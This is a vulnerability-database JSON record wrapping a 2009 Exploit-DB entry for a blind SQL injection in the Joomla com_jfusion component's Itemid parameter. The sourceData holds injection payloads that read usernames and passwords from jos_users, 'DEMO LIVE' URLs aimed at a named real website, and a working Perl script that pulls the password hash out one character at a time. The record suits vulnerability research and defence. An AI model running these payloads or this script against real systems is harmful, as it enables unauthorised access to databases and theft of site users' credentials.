{"id": "EDB-ID:9324", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla! Component com_jfusion - 'itemID' Blind SQL Injection", "description": "", "published": "2009-08-01T00:00:00", "modified": "2009-08-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/9324", "reporter": "Chip d3 bi0s", "references": [], "cvelist": ["2009-2782"], "immutableFields": [], "lastseen": "2023-04-06T16:51:05", "viewCount": 24, "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "_state": {"dependencies": 1680799876, "score": 1683811524, "epss": 1680804120}, "_internal": {"score_hash": "16354a9340bbaee1e2cdbc99ed202ea8"}, "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/9324.txt", "sourceData": "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\nJoomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n\n###################################################\n[+] Author : Chip D3 Bi0s\n[+] Email : chipdebios[alt+64]gmail.com\n[+] Vulnerability : Blind SQL injection\n\n###################################################\n\n\nExample:\nhttp://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code]\nn:valid Itemid\n\nSql code:\n+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*\n+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*\n\netc, etc...\n\nDEMO LIVE:\nhttp://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1\n\n\nhttp://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97\n!False 
\u00a1\u00a1\u00a1\u00a1\n\nhttp://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98\n\u00a1True \u00a1\u00a1\u00a1\u00a1\n\netc, etc....\n\nI let a script that could save this job::example use\nNote:\nItemid:\tvalid for the Web\ncoincidencia : \tseen in 1 = 1 and not 1 !=\n\n\n\nhttp://wwww.host.org/Path : http://www.cd7.com.ec/\n[-] Introduce Itemid : 66\n[-] Introduce coincidencia : http://www.cd7.com.ec/forum/\n\n+++++++++++++++++++++++++++++++++++++++\n#[!] Produced in South America\n+++++++++++++++++++++++++++++++++++++++\n\n\n#!/usr/bin/perl -w\nuse LWP::UserAgent;\nuse Benchmark;\nmy $t1 = new Benchmark;\n\n\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\nprint \"\\t\\t | Chip d3 Bi0s | \\n\\n\";\nprint \"\\t\\t Joomla Component com_jfusion (Itemid) Blind SQL-injection \\n\\n\";\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\n\n\nprint \"http://wwww.host.org/Path : \";chomp(my $target=<STDIN>);\nprint \" [-] Introduce Itemid : \";chomp($z=<STDIN>);\nprint \" [-] Introduce coincidencia : \";chomp($w=<STDIN>);\n\n\n$column_name=\"concat(password)\";\n$table_name=\"jos_users\";\n\n\n$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\n\nprint \"----------------Inyectando----------------\\n\";\n\n#es Vulnerable?\n $host = $target . \"/index.php?option=com_jfusion&Itemid=\".$z.\"+and+1=1\";\n my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;\n if ($content =~ /$regexp/) {\n\n$host = $target . 
\"/index.php?option=com_jfusion&Itemid=\".$z.\"+and+1=2\";\n my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;\n if ($content =~ /$regexp/) {print \" [-] Exploit Fallo :(\\n\";}\n\nelse\n\n{print \" [-] Vulnerable :)\\n\";\n\nfor ($x=1;$x<=32;$x++)\n\t{\n\n $host = $target . \"/index.php?option=com_jfusion&Itemid=\".$z.\"+and+ascii(substring((SELECT+\".$column_name.\"+from+\".$table_name.\"+limit+0,1),\".$x.\",1))>57\";\n my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;\n print \" [!] \";if($x <= 9 ) {print \"0$x\";}else{print $x;}#para alininear 0..9 con los 10-32\n\n if ($content =~ /$regexp/)\n {\n\n for ($c=97;$c<=102;$c++)\n\n{\n $host = $target . \"/index.php?option=com_jfusion&Itemid=\".$z.\"+and+ascii(substring((SELECT+\".$column_name.\"+from+\".$table_name.\"+limit+0,1),\".$x.\",1))=\".$c.\" \";\n my $res = $b->request(HTTP::Request->new(GET=>$host));\n my $content = $res->content;\n my $regexp = $w;\n\n\n if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print \"-Caracter: $char\\n\"; $c=102;}\n }\n\n\n }\nelse\n{\n\nfor ($c=48;$c<=57;$c++)\n\n{\n $host = $target . \"/index.php?option=com_jfusion&Itemid=\".$z.\"+and+ascii(substring((SELECT+\".$column_name.\"+from+\".$table_name.\"+limit+0,1),\".$x.\",1))=\".$c.\" \";\n my $res = $b->request(HTTP::Request->new(GET=>$host));\n my $content = $res->content;\n my $regexp = $w;\n\n if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print \"-Caracter: $char\\n\"; $c=57;}\n }\n\n\n}\n\n\t}\nprint \" [+] Password :\".\" \".join('', @caracter) . \"\\n\";\nmy $t2 = new Benchmark;\nmy $tt = timediff($t2, $t1);\nprint \"El script tomo:\",timestr($tt),\"\\n\";\n\n}\n}\n\nelse\n\n{print \" [-] Exploit Fallo :(\\n\";}\n\n# milw0rm.com [2009-08-01]", "osvdbidlist": ["57156"], "exploitType": "webapps", "verified": true}
{}